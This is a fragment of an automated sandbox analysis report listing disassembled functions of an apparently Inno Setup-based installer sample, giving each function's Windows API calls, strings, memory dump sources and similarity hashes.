                                                                                • Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
                                                                                Function 00458DA8 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?), ref: 00458DDF
                                                                                • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
                                                                                • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
                                                                                • GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
                                                                                • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
                                                                                Strings
                                                                                • Helper process exited, but failed to get exit code., xrefs: 00458E53
                                                                                • Helper process exited., xrefs: 00458E29
                                                                                • Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
                                                                                • Helper process exited with failure code: 0x%x, xrefs: 00458E47
                                                                                • Helper isn't responding; killing it., xrefs: 00458DEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                • API String ID: 3355656108-1243109208
                                                                                • Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                • Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
                                                                                • Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                • Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
                                                                                Function 00454514 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                                                  • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                                                • , xrefs: 0045459D
                                                                                • RegCreateKeyEx, xrefs: 004545AF
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFormatMessageQueryValue
                                                                                • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                • API String ID: 2481121983-1280779767
                                                                                • Opcode ID: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                                • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                                                • Opcode Fuzzy Hash: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                                • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                                                Function 00496620 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                  • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                                                • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                                                • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                                                  • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                • 73EA5CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                • API String ID: 170458502-2312673372
                                                                                • Opcode ID: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                                • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                                                • Opcode Fuzzy Hash: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                                • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                                                Function 0042E428 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                • String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                • API String ID: 4190037839-1003587384
                                                                                • Opcode ID: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                                • Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
                                                                                • Opcode Fuzzy Hash: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                                • Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
                                                                                Function 00462D5C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 00462D68
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
                                                                                • GetWindowRect.USER32(?,00000000), ref: 00462DE2
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                • API String ID: 2610873146-3407710046
                                                                                • Opcode ID: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                                • Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
                                                                                • Opcode Fuzzy Hash: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                                • Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
                                                                                Function 0042F198 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 0042F1A4
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
                                                                                • GetWindowRect.USER32(?,00000000), ref: 0042F21E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                • API String ID: 2610873146-3407710046
                                                                                • Opcode ID: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                                • Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
                                                                                • Opcode Fuzzy Hash: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                                • Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
                                                                                Function 00458F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02153858,00000000), ref: 00458FDD
                                                                                • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                                                • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                                                • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                                                • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                • String ID: CreateEvent$TransactNamedPipe
                                                                                • API String ID: 2182916169-3012584893
                                                                                • Opcode ID: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                                                • Opcode Fuzzy Hash: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                                                Function 00456B58 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                                                • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                                                • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                • API String ID: 1914119943-2711329623
                                                                                • Opcode ID: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                                                • Opcode Fuzzy Hash: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                                                Function 00401A90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                • LocalFree.KERNEL32(006D3F78,00000000,00401B68), ref: 00401ACF
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,006D3F78,00000000,00401B68), ref: 00401AEE
                                                                                • LocalFree.KERNEL32(006D4F78,?,00000000,00008000,006D3F78,00000000,00401B68), ref: 00401B2D
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: LUm$x?m$xOm
                                                                                • API String ID: 3782394904-1117891313
                                                                                • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                • SaveDC.GDI32(?), ref: 00416E37
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                • DeleteObject.GDI32(?), ref: 00416F32
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                • Opcode Fuzzy Hash: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
